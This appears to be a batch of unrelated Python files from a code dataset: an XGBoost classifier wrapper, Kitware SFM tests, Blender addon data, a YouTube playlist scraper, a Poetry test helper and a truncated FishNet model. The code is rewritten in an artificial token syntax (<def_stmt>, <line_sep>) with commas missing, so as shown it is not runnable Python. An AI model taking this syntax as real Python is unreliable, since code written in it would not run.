nthread=1 objective='multi:softprob' reg_alpha=1. reg_lambda=0. reg_lambda_bias=0. seed=0 silent=<true> subsample=1.<block_start>self.param={"objective":objective "booster":booster "eta":learning_rate "max_depth":max_depth "colsample_bylevel":colsample_bylevel "colsample_bytree":colsample_bytree "subsample":subsample "min_child_weight":min_child_weight "gamma":gamma "alpha":reg_alpha "lambda":reg_lambda "lambda_bias":reg_lambda_bias "seed":seed "silent":1<if>silent<else>0 "nthread":nthread "max_delta_step":max_delta_step "num_class":num_class }<line_sep>self.missing=missing<if>missing<is><not><none><else>np.nan<line_sep>self.n_estimators=n_estimators<line_sep>self.base_score=base_score<line_sep>self.num_class=num_class<block_end><def_stmt>__str__ self<block_start><return>self.__repr__()<block_end><def_stmt>__repr__ self<block_start><return>("%s(num_class=%d, booster=\'%s\', base_score=%f, colsample_bylevel=%f, \n"<concat>"colsample_bytree=%f, gamma=%f, learning_rate=%f, max_delta_step=%f, \n"<concat>"max_depth=%d, min_child_weight=%f, missing=\'%s\', n_estimators=%d, \n"<concat>"nthread=%d, objective=\'%s\', reg_alpha=%f, reg_lambda=%f, \n"<concat>"reg_lambda_bias=%f, seed=%d, silent=%d, subsample=%f)"%(self.__class__.__name__ self.num_class self.param["booster"] self.base_score self.param["colsample_bylevel"] self.param["colsample_bytree"] self.param["gamma"] self.param["eta"] self.param["max_delta_step"] self.param["max_depth"] self.param["min_child_weight"] str(self.missing) self.n_estimators self.param["nthread"] self.param["objective"] self.param["alpha"] self.param["lambda"] self.param["lambda_bias"] self.param["seed"] self.param["silent"] self.param["subsample"] ))<block_end><def_stmt>fit self X y feature_names=<none><block_start>data=xgb.DMatrix(X label=y missing=self.missing feature_names=feature_names)<line_sep>data.set_base_margin(self.base_score<times>np.ones(X.shape[0]<times>self.num_class))<line_sep>self.model=xgb.train(self.param data self.n_estimators)<line_sep><return>self<block_end><def_stmt>predict_proba self X feature_names=<none><block_start>data=xgb.DMatrix(X missing=self.missing feature_names=feature_names)<line_sep>data.set_base_margin(self.base_score<times>np.ones(X.shape[0]<times>self.num_class))<line_sep>proba=self.model.predict(data)<line_sep>proba=proba.reshape(X.shape[0] self.num_class)<line_sep><return>proba<block_end><def_stmt>predict self X feature_names=<none><block_start>proba=self.predict_proba(X feature_names=feature_names)<line_sep>y_pred=np.argmax(proba axis=1)<line_sep><return>y_pred<block_end><def_stmt>plot_importance self<block_start>ax=xgb.plot_importance(self.model)<line_sep>self.save_topn_features()<line_sep><return>ax<block_end><def_stmt>save_topn_features self fname="XGBClassifier_topn_features.txt" topn=10<block_start>ax=xgb.plot_importance(self.model)<line_sep>yticklabels=ax.get_yticklabels()[::-1]<if_stmt>topn<eq>-1<block_start>topn=len(yticklabels)<block_end><else_stmt><block_start>topn=min(topn len(yticklabels))<block_end><with_stmt>open(fname "w")<as>f<block_start><for_stmt>i range(topn)<block_start>f.write("%s\n"%yticklabels[i].get_text())<block_end><block_end><block_end><block_end><class_stmt>HomedepotXGBClassifier(XGBClassifier)<block_start><def_stmt>__init__ self booster='gbtree' base_score=0. colsample_bylevel=1. colsample_bytree=1. gamma=0. learning_rate=0.1 max_delta_step=0. max_depth=6 min_child_weight=1. missing=<none> n_estimators=100 nthread=1 objective='multi:softprob' reg_alpha=1. reg_lambda=0. reg_lambda_bias=0. seed=0 silent=<true> subsample=1.<block_start>super().__init__(num_class=1 booster=booster base_score=base_score colsample_bylevel=colsample_bylevel colsample_bytree=colsample_bytree gamma=gamma learning_rate=learning_rate max_delta_step=max_delta_step max_depth=max_depth min_child_weight=min_child_weight missing=missing n_estimators=n_estimators nthread=nthread objective=objective reg_alpha=reg_alpha reg_lambda=reg_lambda reg_lambda_bias=reg_lambda_bias seed=seed silent=silent subsample=subsample)<line_sep># encode relevance to label
self.encoder={1.00:0 1.25:1 1.33:2 1.50:3 1.67:4 1.75:5 2.00:6 2.25:7 2.33:8 2.50:9 2.67:10 2.75:11 3.00:12 }<line_sep># decode label to relevance
self.decoder={v:k<for>k,v self.encoder.items()}<line_sep>self.num_class=len(self.encoder.keys())<line_sep>self.param["num_class"]=self.num_class<block_end><def_stmt>fit self X y# encode relevance to label
<block_start>y=list(map(self.encoder.get y))<line_sep>y=np.asarray(y dtype=int)<line_sep>super().fit(X y)<line_sep><return>self<block_end><def_stmt>predict self X<block_start>y_pred=super().predict(X)<line_sep># decode label to relevance
y_pred=list(map(self.decoder.get y_pred))<line_sep>y_pred=np.asarray(y_pred dtype=float)<line_sep><return>y_pred<block_end><block_end>
|
"""
ckwg +31
Copyright 2020 by Kitware, Inc.
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither name of Kitware, Inc. nor the names of any contributors may be used
to endorse or promote products derived from this software without specific
prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS ``AS IS''
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHORS OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
==============================================================================
Tests for Python interface to vital::sfm_constraints
"""<import_stmt>nose.tools<as>nt<import_stmt>unittest<import_stmt>numpy<as>np<import_from_stmt>kwiver.vital.modules modules<import_from_stmt>kwiver.vital.types.metadata *<import_from_stmt>kwiver.vital.types.metadata_traits *<import_from_stmt>kwiver.vital.types Metadata LocalGeoCS rotation RotationD RotationF SFMConstraints geodesy GeoPoint metadata_tags<as>mt SimpleMetadataMap <line_sep>modules.load_known_modules()<class_stmt>TestSFMConstraints(unittest.TestCase)<block_start>@classmethod<def_stmt>setUp self<block_start>self.meta_=SimpleMetadataMap()<line_sep>self.geo_=LocalGeoCS()<line_sep>self.small_tag=[mt.tags.VITAL_META_UNKNOWN mt.tags.VITAL_META_UNIX_TIMESTAMP mt.tags.VITAL_META_SLANT_RANGE mt.tags.VITAL_META_MISSION_ID mt.tags.VITAL_META_VIDEO_KEY_FRAME ]<line_sep>self.loc1=np.array([-73.759291 42.849631])<line_sep>self.crs_ll=geodesy.SRID.lat_lon_WGS84<line_sep>self.geo_pt1_=GeoPoint(self.loc1 self.crs_ll)<line_sep>self.geo_.geo_origin=self.geo_pt1_<block_end><def_stmt>test_init self<block_start>s=SFMConstraints()<line_sep>SFMConstraints(s)<line_sep>SFMConstraints(self.meta_ self.geo_)<block_end><def_stmt>test_properties self# modules.load_known_modules()
# metadata property
<block_start>s=SFMConstraints(self.meta_ self.geo_)<line_sep>get_meta=s.metadata<line_sep>nt.assert_equal(get_meta.size() 0)<line_sep>m=SimpleMetadataMap()<line_sep>s.metadata=m<line_sep>nt.assert_equal(s.metadata.size() 0)<line_sep># local_geo_property
ret_geo=s.local_geo_cs<line_sep>np.testing.assert_array_almost_equal(ret_geo.geo_origin.location(self.crs_ll) self.geo_pt1_.location())<line_sep>s=SFMConstraints()<line_sep>s.local_geo_cs=self.geo_<line_sep>ret_geo=s.local_geo_cs<line_sep>np.testing.assert_array_almost_equal(ret_geo.geo_origin.location(self.crs_ll) self.geo_pt1_.location())<block_end><def_stmt>test_get_camera_position_prior_local self<block_start>s=SFMConstraints(self.meta_ self.geo_)<line_sep>nt.assert_false(s.get_camera_position_prior_local(0 np.array([0 1 3])))<line_sep>nt.assert_false(s.get_camera_position_prior_local(0 RotationD([1 2 3 4])))<block_end><def_stmt>test_camera_position_priors self<block_start>s=SFMConstraints(self.meta_ self.geo_)<line_sep>nt.assert_dict_equal(s.get_camera_position_priors() {})<block_end><def_stmt>test_image_properties self<block_start>s=SFMConstraints(self.meta_ self.geo_)<line_sep>s.store_image_size(0 1080 720)<line_sep>a,b=0 0<line_sep>founda,foundb=<false> <false><line_sep>founda,a=s.get_image_width(0 a)<line_sep>foundb,b=s.get_image_height(0 b)<line_sep>nt.ok_(founda)<line_sep>nt.ok_(foundb)<line_sep>nt.assert_equal(a 1080)<line_sep>nt.assert_equal(b 720)<line_sep>found_focal=<true><line_sep>focal_len=0.1<line_sep>found_focal,focal_len=s.get_focal_length_prior(0 focal_len)<line_sep>nt.assert_false(found_focal)<line_sep>nt.assert_almost_equal(focal_len 0.1)<block_end><block_end>
|
bl_addon_data={(2 5 3):{(0 0 601):{'binary_name':'ogrekit' 'api_compatibility':{31845:{(0 0 601):(995 -1)}} 'binary_urls':{'linux-32':'<ogrekit 0.0.601 executable URL>' 'linux-64':'<ogrekit 0.0.601 executable URL>' 'windows-32':'<ogrekit 0.0.601 executable URL>' 'windows-64':'<ogrekit 0.0.601 executable URL>' 'osx-intel':'<ogrekit 0.0.601 executable URL>' 'osx-ppc':'<ogrekit 0.0.601 executable URL>'}}}}<line_sep>
|
"""Youtube playlist related functions and classes
defined.
"""<import_stmt>json<import_stmt>requests<import_from_stmt>bs4 BeautifulSoup<import_stmt>re<import_from_stmt>playx.utility exe<import_from_stmt>playx.playlist.playlistbase PlaylistBase SongMetadataBase<import_from_stmt>playx.stringutils remove_punct<import_from_stmt>playx.logger Logger<line_sep># Setup logger
logger=Logger("YoutubePlaylist")<class_stmt>YoutubeMetadata(SongMetadataBase)<block_start><def_stmt>__init__ self url="" title=""<block_start>super().__init__(title url "")<line_sep>self._create_search_query()<block_end><def_stmt>_create_search_query self<block_start>"""
Create a search querry.
"""<line_sep>self.search_query=self.URL<block_end><def_stmt>display self<block_start>"""Be informative."""<line_sep>logger.info("Title: {}".format(self.title))<block_end><block_end><class_stmt>YoutubePlaylist(PlaylistBase)<block_start>"""
Class to store YouTube playlist data.
This is where we try to parse ourselves the results of the pages.
Only works for first 100 songs.
If we want to fetch more, we have to do other ajax request or simulate
scrolling which is another problem.
Refer to `YoutubePlaylist2`
"""<def_stmt>__init__ self URL pl_start=<none> pl_end=<none><block_start>"""Init the URl."""<line_sep>super().__init__(pl_start pl_end)<line_sep>self.URL=URL<line_sep>self.list_content_tuple=[]<line_sep>self.playlist_name=""<line_sep>self._DELETED=["deleted video" "मेटाइएको भिडियो" "private video" ]<block_end><def_stmt>extract_name self name<block_start>"""Extract the name of the playlist."""<line_sep>name=str(name).replace("\n" "")<line_sep>name="".join(re.findall(r">.*?<" name)).replace(">" "").replace("<" "")<line_sep>name=" ".join(re.findall(r"[^ ]+" name))<line_sep>name=remove_punct(name)<line_sep>self.playlist_name=name<block_end><def_stmt>_is_connection_possible self<block_start>"""Make a simple request to check if connection is possible.
i:e check if internet is connected.
"""<line_sep>url="https://google.com"<try_stmt><block_start>requests.get(url)<block_end><except_stmt>requests.exceptions.ConnectionError<block_start><return><false><block_end><return><true><block_end><def_stmt>_check_valid self url<block_start>"""Check if the passed URL is valid."""<line_sep>h={"User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux \
x86_64; rv:49.0) Gecko/20100101 Firefox/49.0"}<line_sep>s=BeautifulSoup(requests.get(url headers=h).text "lxml")<line_sep>t='window["ytInitialData"] = '<line_sep>i=next((i<for>i s.find_all("script")<if>t<in>str(i)))<line_sep>i=i.get_text().replace(t "").replace("\n" "")<line_sep>i=re.sub(r'^.*"playabilityStatus"' "" i)<line_sep>i=i.split(",")<line_sep>status=re.sub(r':|\{|"|status' "" i[0])<if_stmt>status<eq>"OK"<block_start><return><true><block_end><else_stmt><block_start>reason=next((r<for>r i<if>'"reason"'<in>r))<line_sep>reason=re.sub(r':|\{|"|reason|simpleText|}' "" reason)<line_sep>logger.info("Skipping {}: {} {}".format(url status reason))<line_sep><return><false><block_end><block_end><def_stmt>extract_playlistdata self<block_start>"""Extract all the videos into YoutubeMetadata objects."""<line_sep>url_prepend="https://www.youtube.com/watch?v="<line_sep>url_base="https://www.youtube.com"<if_stmt><not>self._is_connection_possible()<block_start>logger.warning("Cannot play playlist. No connection detected!")<line_sep><return>"N/A" []<block_end>r=requests.get(self.URL)<line_sep>soup=BeautifulSoup(r.text "html.parser")<line_sep>name=soup.findAll("h1" attrs={"class":"pl-header-title"})<line_sep>self.extract_name(name)<line_sep># soup = soup.findAll('tr', attrs={'class': 'pl-video',
# 'class': 'yt-uix-tile'})
logger.debug(len(soup))<line_sep># use regex to get video url
# this seems rigid against <div> changes
# so, far this works
links=soup.find_all("a" href=re.compile(r".*watch.*")# this regex can be improved in future
)<for_stmt>link links<block_start>href=link["href"]<line_sep>title=link.contents[0]<line_sep># If the link is not a video from playlist, there will be no
# 'index' substring. Hence, we can skip this
<if_stmt>"index"<not><in>href<block_start><continue><block_end># Just to make sure the title is not empty. This is done because
# there is always a first link that contains 'index', yet does not
# have a title. This represents the meta-link: a link to playlist
# itself.
title=title.strip()<if_stmt><not>title<block_start><continue><block_end># Get video url using simple algorithm. This 3 index search is done
# just to make sure when youtube playlist url has these query
# params in shuffled order.
slicer=self._get_url_slicer(href)<line_sep>url=url_base+href[:slicer]<line_sep># Check if the video is deleted. Some videos in playlist turn out
# to be deleted videos. We can put a check for that by checking
# if the title is [Deleted video]
# We have a simpler way to check for deleted videos
<if_stmt>title.lower()[1:-1]<in>self._DELETED<block_start>logger.debug(title.lower()[1:-1])<line_sep>logger.info("Skipping {}: DELETED/BLOCKED/PRIVATE video.".format(url))<line_sep><continue><block_end><if_stmt><not>self._check_valid(url)<block_start><continue><block_end>self.list_content_tuple.append(YoutubeMetadata(url title))<block_end><if_stmt>len(self.list_content_tuple)<eq>0<block_start>logger.warning("Are you sure you have videos in your playlist? Try changing\
privacy to public.")<block_end>self.strip_to_start_end()<block_end><def_stmt>_get_url_slicer self url<block_start>slicers=[]<line_sep>strings=["&index=" "&t=" "&list="]<for_stmt>s strings<block_start><try_stmt><block_start>slicer=url.index(s)<line_sep>slicers.append(slicer)<block_end><except_stmt>ValueError<block_start><continue><block_end><block_end><return>min(slicers)<block_end><block_end><class_stmt>YoutubePlaylist2(YoutubePlaylist)<block_start>"""
Class to store YouTube playlist data.
This uses youtube-dl --flat-playlist command to fetch everything.
This is more robust since we don't have to manually parse everything.
Plus this solves the issue with ajax/scrolling if playlist has more than
100 songs.
"""<def_stmt>extract_playlistdata self<block_start>url_prepend="https://www.youtube.com/watch?v="<line_sep>url_base="https://www.youtube.com"<if_stmt><not>self._is_connection_possible()<block_start>logger.warning("Cannot play playlist. No connection detected!")<line_sep><return>"N/A" []<block_end># first get playlist name
logger.info(f"Fetching playlist name for [{self.URL}]")<line_sep>r=requests.get(self.URL)<line_sep>soup=BeautifulSoup(r.text "html.parser")<line_sep>name=soup.findAll("h1" attrs={"class":"pl-header-title"})<line_sep>self.extract_name(name)<line_sep>logger.info(f"Playlist name = [{self.playlist_name}]")<line_sep>logger.info("Fetching songs...")<line_sep>cmd=f"youtube-dl -j --flat-playlist {self.URL}"<line_sep>output,errors=exe(cmd)<if_stmt><not>output<and>errors<block_start>logger.error("Unable to extract playlist")<line_sep><return>"N/A" []<block_end>videos=list(map(json.loads output.split("\n")))<line_sep>logger.info(f"Found {len(videos)} songs")<for_stmt>i,video enumerate(videos)<block_start>title=video["title"].strip()<line_sep>url=video["url"]<line_sep>url=url_prepend+url<if_stmt>title.lower()[1:-1]<in>self._DELETED<block_start>logger.debug(title.lower()[1:-1])<line_sep>logger.info(f"Skipping [{url}] Possibly DELETED/BLOCKED/PRIVATE video.")<line_sep><continue><block_end>logger.info(f"Checking if [{title}] [{url}] is available")<if_stmt><not>self._check_valid(url)<block_start>logger.info("Skipping...")<line_sep><continue><block_end>self.list_content_tuple.append(YoutubeMetadata(url title))<block_end><if_stmt>len(self.list_content_tuple)<eq>0<block_start>logger.warning("Are you sure you have videos in your playlist? Try changing\
privacy to public.")<block_end>self.strip_to_start_end()<if_stmt>len(self.list_content_tuple)<eq>0<block_start>logger.warning("Are you sure you have videos in your playlist? Try changing\
privacy to public.")<block_end>self.strip_to_start_end()<block_end><block_end><def_stmt>get_data URL pl_start pl_end<block_start>"""Generic function. Should be called only when
it is checked if the URL is a youtube playlist.
Returns a tuple containing the songs and name of
the playlist.
"""<line_sep>logger.debug("Extracting Playlist Content")<line_sep>youtube_playlist=YoutubePlaylist2(URL pl_start pl_end)<line_sep>youtube_playlist.extract_playlistdata()<line_sep><return>youtube_playlist.list_content_tuple youtube_playlist.playlist_name<block_end><def_stmt>main <block_start>url="https://www.youtube.com/playlist?list=PLwg22VSCR0W6cwuCKUJSkX72xEvYXS0Zx"<line_sep>print(url)<line_sep>yp=YoutubePlaylist2(url)<line_sep>yp.extract_playlistdata()<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
|
<import_from_future_stmt> annotations<import_from_stmt>pathlib Path<import_from_stmt>typing TYPE_CHECKING<import_from_stmt>poetry.factory Factory<if_stmt>TYPE_CHECKING<block_start><import_from_stmt>tomlkit.container Table<as>TOMLTable<block_end><def_stmt>get_self_command_dependencies locked:bool=<true><arrow>TOMLTable<block_start><import_from_stmt>poetry.console.commands.self.self_command SelfCommand<import_from_stmt>poetry.locations CONFIG_DIR<line_sep>system_pyproject_file=SelfCommand.get_default_system_pyproject_file()<assert_stmt>system_pyproject_file.exists()<assert_stmt>system_pyproject_file.parent<eq>Path(CONFIG_DIR)<if_stmt>locked<block_start><assert_stmt>system_pyproject_file.parent.joinpath("poetry.lock").exists()<block_end>poetry=Factory().create_poetry(system_pyproject_file.parent disable_plugins=<true>)<line_sep>content=poetry.file.read()["tool"]["poetry"]<assert_stmt>"group"<in>content<assert_stmt>SelfCommand.ADDITIONAL_PACKAGE_GROUP<in>content["group"]<assert_stmt>"dependencies"<in>content["group"][SelfCommand.ADDITIONAL_PACKAGE_GROUP]<line_sep><return>content["group"][SelfCommand.ADDITIONAL_PACKAGE_GROUP]["dependencies"]<block_end>
|
"""
FishNet for ImageNet-1K, implemented in Gluon.
Original paper: 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
"""<line_sep>__all__=['FishNet' 'fishnet99' 'fishnet150' 'ChannelSqueeze']<import_stmt>os<import_from_stmt>mxnet cpu<import_from_stmt>mxnet.gluon nn HybridBlock<import_from_stmt>mxnet.gluon.contrib.nn Identity<import_from_stmt>.common pre_conv1x1_block pre_conv3x3_block conv1x1 SesquialteralHourglass InterpolationBlock<import_from_stmt>.preresnet PreResActivation<import_from_stmt>.senet SEInitBlock<def_stmt>channel_squeeze x channels_per_group<block_start>"""
Channel squeeze operation.
Parameters:
----------
x : NDArray
Input tensor.
channels_per_group : int
Number of channels per group.
Returns:
-------
NDArray
Resulted tensor.
"""<line_sep><return>x.reshape((0 -4 channels_per_group -1 -2)).sum(axis=2)<block_end><class_stmt>ChannelSqueeze(HybridBlock)<block_start>"""
Channel squeeze layer. This is a wrapper over the same operation. It is designed to save the number of groups.
Parameters:
----------
channels : int
Number of channels.
groups : int
Number of groups.
"""<def_stmt>__init__ self channels groups **kwargs<block_start>super(ChannelSqueeze self).__init__(**kwargs)<assert_stmt>(channels%groups<eq>0)<line_sep>self.channels_per_group=channels<floordiv>groups<block_end><def_stmt>hybrid_forward self F x<block_start><return>channel_squeeze(x self.channels_per_group)<block_end><block_end><class_stmt>PreSEAttBlock(HybridBlock)<block_start>"""
FishNet specific Squeeze-and-Excitation attention block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
reduction : int, default 16
Squeeze reduction value.
"""<def_stmt>__init__ self in_channels out_channels bn_use_global_stats reduction=16 **kwargs<block_start>super(PreSEAttBlock self).__init__(**kwargs)<line_sep>mid_cannels=out_channels<floordiv>reduction<with_stmt>self.name_scope()<block_start>self.bn=nn.BatchNorm(in_channels=in_channels use_global_stats=bn_use_global_stats)<line_sep>self.relu=nn.Activation("relu")<line_sep>self.conv1=conv1x1(in_channels=in_channels out_channels=mid_cannels use_bias=<true>)<line_sep>self.conv2=conv1x1(in_channels=mid_cannels out_channels=out_channels use_bias=<true>)<line_sep>self.sigmoid=nn.Activation("sigmoid")<block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.bn(x)<line_sep>x=self.relu(x)<line_sep>x=F.contrib.AdaptiveAvgPooling2D(x output_size=1)<line_sep>x=self.conv1(x)<line_sep>x=self.relu(x)<line_sep>x=self.conv2(x)<line_sep>x=self.sigmoid(x)<line_sep><return>x<block_end><block_end><class_stmt>FishBottleneck(HybridBlock)<block_start>"""
FishNet bottleneck block for residual unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int
Strides of the convolution.
dilation : int or tuple/list of 2 int
Dilation value for convolution layer.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""<def_stmt>__init__ self in_channels out_channels strides dilation bn_use_global_stats **kwargs<block_start>super(FishBottleneck self).__init__(**kwargs)<line_sep>mid_channels=out_channels<floordiv>4<with_stmt>self.name_scope()<block_start>self.conv1=pre_conv1x1_block(in_channels=in_channels out_channels=mid_channels bn_use_global_stats=bn_use_global_stats)<line_sep>self.conv2=pre_conv3x3_block(in_channels=mid_channels out_channels=mid_channels strides=strides padding=dilation dilation=dilation bn_use_global_stats=bn_use_global_stats)<line_sep>self.conv3=pre_conv1x1_block(in_channels=mid_channels out_channels=out_channels bn_use_global_stats=bn_use_global_stats)<block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.conv1(x)<line_sep>x=self.conv2(x)<line_sep>x=self.conv3(x)<line_sep><return>x<block_end><block_end><class_stmt>FishBlock(HybridBlock)<block_start>"""
FishNet block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels : int
Number of output channels.
strides : int or tuple/list of 2 int, default 1
Strides of the convolution.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
bn_use_global_stats : bool, default False
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
squeeze : bool, default False
Whether to use a channel squeeze operation.
"""<def_stmt>__init__ self in_channels out_channels strides=1 dilation=1 bn_use_global_stats=<false> squeeze=<false> **kwargs<block_start>super(FishBlock self).__init__(**kwargs)<line_sep>self.squeeze=squeeze<line_sep>self.resize_identity=(in_channels<ne>out_channels)<or>(strides<ne>1)<with_stmt>self.name_scope()<block_start>self.body=FishBottleneck(in_channels=in_channels out_channels=out_channels strides=strides dilation=dilation bn_use_global_stats=bn_use_global_stats)<if_stmt>self.squeeze<block_start><assert_stmt>(in_channels<floordiv>2<eq>out_channels)<line_sep>self.c_squeeze=ChannelSqueeze(channels=in_channels groups=2)<block_end><elif_stmt>self.resize_identity<block_start>self.identity_conv=pre_conv1x1_block(in_channels=in_channels out_channels=out_channels strides=strides bn_use_global_stats=bn_use_global_stats)<block_end><block_end><block_end><def_stmt>hybrid_forward self F x<block_start><if_stmt>self.squeeze<block_start>identity=self.c_squeeze(x)<block_end><elif_stmt>self.resize_identity<block_start>identity=self.identity_conv(x)<block_end><else_stmt><block_start>identity=x<block_end>x=self.body(x)<line_sep>x=x+identity<line_sep><return>x<block_end><block_end><class_stmt>DownUnit(HybridBlock)<block_start>"""
FishNet down unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""<def_stmt>__init__ self in_channels out_channels_list bn_use_global_stats **kwargs<block_start>super(DownUnit self).__init__(**kwargs)<with_stmt>self.name_scope()<block_start>self.blocks=nn.HybridSequential(prefix="")<for_stmt>i,out_channels enumerate(out_channels_list)<block_start>self.blocks.add(FishBlock(in_channels=in_channels out_channels=out_channels bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=out_channels<block_end>self.pool=nn.MaxPool2D(pool_size=2 strides=2)<block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.blocks(x)<line_sep>x=self.pool(x)<line_sep><return>x<block_end><block_end><class_stmt>UpUnit(HybridBlock)<block_start>"""
FishNet up unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
dilation : int or tuple/list of 2 int, default 1
Dilation value for convolution layer.
bn_use_global_stats : bool, default False
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""<def_stmt>__init__ self in_channels out_channels_list dilation=1 bn_use_global_stats=<false> **kwargs<block_start>super(UpUnit self).__init__(**kwargs)<with_stmt>self.name_scope()<block_start>self.blocks=nn.HybridSequential(prefix="")<for_stmt>i,out_channels enumerate(out_channels_list)<block_start>squeeze=(dilation<g>1)<and>(i<eq>0)<line_sep>self.blocks.add(FishBlock(in_channels=in_channels out_channels=out_channels dilation=dilation bn_use_global_stats=bn_use_global_stats squeeze=squeeze))<line_sep>in_channels=out_channels<block_end>self.upsample=InterpolationBlock(scale_factor=2 bilinear=<false>)<block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.blocks(x)<line_sep>x=self.upsample(x)<line_sep><return>x<block_end><block_end><class_stmt>SkipUnit(HybridBlock)<block_start>"""
FishNet skip connection unit.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""<def_stmt>__init__ self in_channels out_channels_list bn_use_global_stats **kwargs<block_start>super(SkipUnit self).__init__(**kwargs)<with_stmt>self.name_scope()<block_start>self.blocks=nn.HybridSequential(prefix="")<for_stmt>i,out_channels enumerate(out_channels_list)<block_start>self.blocks.add(FishBlock(in_channels=in_channels out_channels=out_channels bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=out_channels<block_end><block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.blocks(x)<line_sep><return>x<block_end><block_end><class_stmt>SkipAttUnit(HybridBlock)<block_start>"""
FishNet skip connection unit with attention block.
Parameters:
----------
in_channels : int
Number of input channels.
out_channels_list : list of int
Number of output channels for each block.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""<def_stmt>__init__ self in_channels out_channels_list bn_use_global_stats **kwargs<block_start>super(SkipAttUnit self).__init__(**kwargs)<line_sep>mid_channels1=in_channels<floordiv>2<line_sep>mid_channels2=2<times>in_channels<with_stmt>self.name_scope()<block_start>self.conv1=pre_conv1x1_block(in_channels=in_channels out_channels=mid_channels1 bn_use_global_stats=bn_use_global_stats)<line_sep>self.conv2=pre_conv1x1_block(in_channels=mid_channels1 out_channels=mid_channels2 use_bias=<true> bn_use_global_stats=bn_use_global_stats)<line_sep>in_channels=mid_channels2<line_sep>self.se=PreSEAttBlock(in_channels=mid_channels2 out_channels=out_channels_list[-1] bn_use_global_stats=bn_use_global_stats)<line_sep>self.blocks=nn.HybridSequential(prefix="")<for_stmt>i,out_channels enumerate(out_channels_list)<block_start>self.blocks.add(FishBlock(in_channels=in_channels out_channels=out_channels bn_use_global_stats=bn_use_global_stats))<line_sep>in_channels=out_channels<block_end><block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.conv1(x)<line_sep>x=self.conv2(x)<line_sep>w=self.se(x)<line_sep>x=self.blocks(x)<line_sep>x=F.broadcast_add(F.broadcast_mul(x w) w)<line_sep><return>x<block_end><block_end><class_stmt>FishFinalBlock(HybridBlock)<block_start>"""
FishNet final block.
Parameters:
----------
in_channels : int
Number of input channels.
bn_use_global_stats : bool
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
"""<def_stmt>__init__ self in_channels bn_use_global_stats **kwargs<block_start>super(FishFinalBlock self).__init__(**kwargs)<line_sep>mid_channels=in_channels<floordiv>2<with_stmt>self.name_scope()<block_start>self.conv1=pre_conv1x1_block(in_channels=in_channels out_channels=mid_channels bn_use_global_stats=bn_use_global_stats)<line_sep>self.preactiv=PreResActivation(in_channels=mid_channels bn_use_global_stats=bn_use_global_stats)<block_end><block_end><def_stmt>hybrid_forward self F x<block_start>x=self.conv1(x)<line_sep>x=self.preactiv(x)<line_sep><return>x<block_end><block_end><class_stmt>FishNet(HybridBlock)<block_start>"""
FishNet model from 'FishNet: A Versatile Backbone for Image, Region, and Pixel Level Prediction,'
http://papers.nips.cc/paper/7356-fishnet-a-versatile-backbone-for-image-region-and-pixel-level-prediction.pdf.
Parameters:
----------
direct_channels : list of list of list of int
Number of output channels for each unit along the straight path.
skip_channels : list of list of list of int
Number of output channels for each skip connection unit.
init_block_channels : int
Number of output channels for the initial unit.
bn_use_global_stats : bool, default False
Whether global moving statistics is used instead of local batch-norm for BatchNorm layers.
Useful for fine-tuning.
in_channels : int, default 3
Number of input channels.
in_size : tuple of two ints, default (224, 224)
Spatial size of the expected input image.
classes : int, default 1000
Number of classification classes.
